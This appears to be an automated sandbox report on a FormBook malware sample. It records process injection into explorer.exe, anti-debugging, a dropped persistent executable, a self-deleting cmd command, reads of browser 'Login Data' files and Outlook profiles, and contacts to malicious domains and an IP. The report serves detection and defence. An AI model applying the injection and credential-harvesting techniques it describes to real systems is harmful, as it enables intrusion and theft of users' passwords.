Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB47DB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 0_2_00FB47DB
Enables debug privileges
Source: C:\Users\user\Desktop\PO201905.exe | Process token adjusted: Debug
Source: C:\Windows\System32\ipconfig.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB34EA SetUnhandledExceptionFilter, | 0_2_00FB34EA
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB16AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_00FB16AB
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB4447 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00FB4447
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB16B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_00FB16B6
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Code function: 12_1_010616AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 12_1_010616AB
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Code function: 12_1_010634EA SetUnhandledExceptionFilter, | 12_1_010634EA
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Code function: 12_1_01064447 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 12_1_01064447
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Code function: 12_1_010616B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 12_1_010616B6

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe | File created: 9rxlgd1bcduf.exe.6.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.91 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PO201905.exe | Section loaded: unknown target pid: 1880 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PO201905.exe | Thread register set: target process: 1880
Source: C:\Windows\System32\ipconfig.exe | Thread register set: target process: 1880
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PO201905.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\ipconfig.exe | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'
Source: C:\Windows\System32\ipconfig.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmp | Binary or memory string: Progmanp

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Users\user\Desktop\PO201905.exe | Code function: 0_2_00FB194C GetSystemTimeAsFileTime,__aulldiv, | 0_2_00FB194C

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\ipconfig.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\System32\ipconfig.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Behavior Graph

Behavior Graph ID: 855421 | Sample: PO201905.exe | Startdate: 06/05/2019 | Architecture: WINDOWS | Score: 100

Sample (root node):
  • DNS: www.lianhe.ink; www.dazhen.ltd; www.dazhen.ltd.w.kunlunsl.com
  • Signatures: Antivirus or Machine Learning detection for dropped file; Antivirus or Machine Learning detection for sample; Multi AV Scanner detection for dropped file; 4 other signatures
  • Started: PO201905.exe

PO201905.exe:
  • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
  • Injected process: explorer.exe

explorer.exe (injected):
  • Network: www.shakeitmiami.com 208.91.197.91, 49243, 80, unknown, Virgin Islands (BRITISH); www.lianhe.ink; 2 other IPs or domains
  • Dropped: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe (PE32); C:\Users\user\AppData\...\9rxlgd1bcduf.exe (PE32)
  • Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files
  • Started: ipconfig.exe; 9rxlgd1bcduf.exe; autoconv.exe

ipconfig.exe:
  • Dropped: C:\Users\user\AppData\...\KM3logrv.ini (data); C:\Users\user\AppData\...\KM3logri.ini (data)
  • Signatures: FormBook malware detected; Creates an undocumented autostart registry key; Tries to steal Mail credentials (via file access); 2 other signatures
  • Started: firefox.exe; cmd.exe

firefox.exe:
  • Dropped: C:\Users\user\AppData\...\KM3logrf.ini (data)

Simulations

Behavior and APIs

Time | Type | Description
21:16:47 | API Interceptor | 5290x Sleep call for process: PO201905.exe modified
21:24:53 | API Interceptor | 120x Sleep call for process: explorer.exe modified

Antivirus and Machine Learning Detection

Initial Sample

Source | Detection | Scanner
PO201905.exe | 16% | virustotal
PO201905.exe | 100% | Joe Sandbox ML

Dropped Files

Source | Detection | Scanner
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | 100% | Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | 100% | Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | 16% | virustotal

Unpacked PE Files

Source | Detection | Scanner
12.1.9rxlgd1bcduf.exe.1060000.0.unpack | 100% | Joe Sandbox ML
0.1.PO201905.exe.fb0000.0.unpack | 100% | Joe Sandbox ML
12.0.9rxlgd1bcduf.exe.1060000.0.unpack | 100% | Joe Sandbox ML
0.2.PO201905.exe.fb0000.3.unpack | 100% | Joe Sandbox ML
0.0.PO201905.exe.fb0000.0.unpack | 100% | Joe Sandbox ML

Domains

Source | Detection | Scanner
www.dazhen.ltd.w.kunlunsl.com | 0% | virustotal
www.dazhen.ltd | 0% | virustotal

URLs

No Antivirus matches

Yara Overview

Initial Sample

Source | Rule | Description | Author
PO201905.exe | Embedded_PE | unknown | unknown

PCAP (Network Traffic)

No yara matches

Dropped Files

Source | Rule | Description | Author
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Embedded_PE | unknown | unknown
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Embedded_PE | unknown | unknown

Memory Dumps

Source | Rule | Description | Author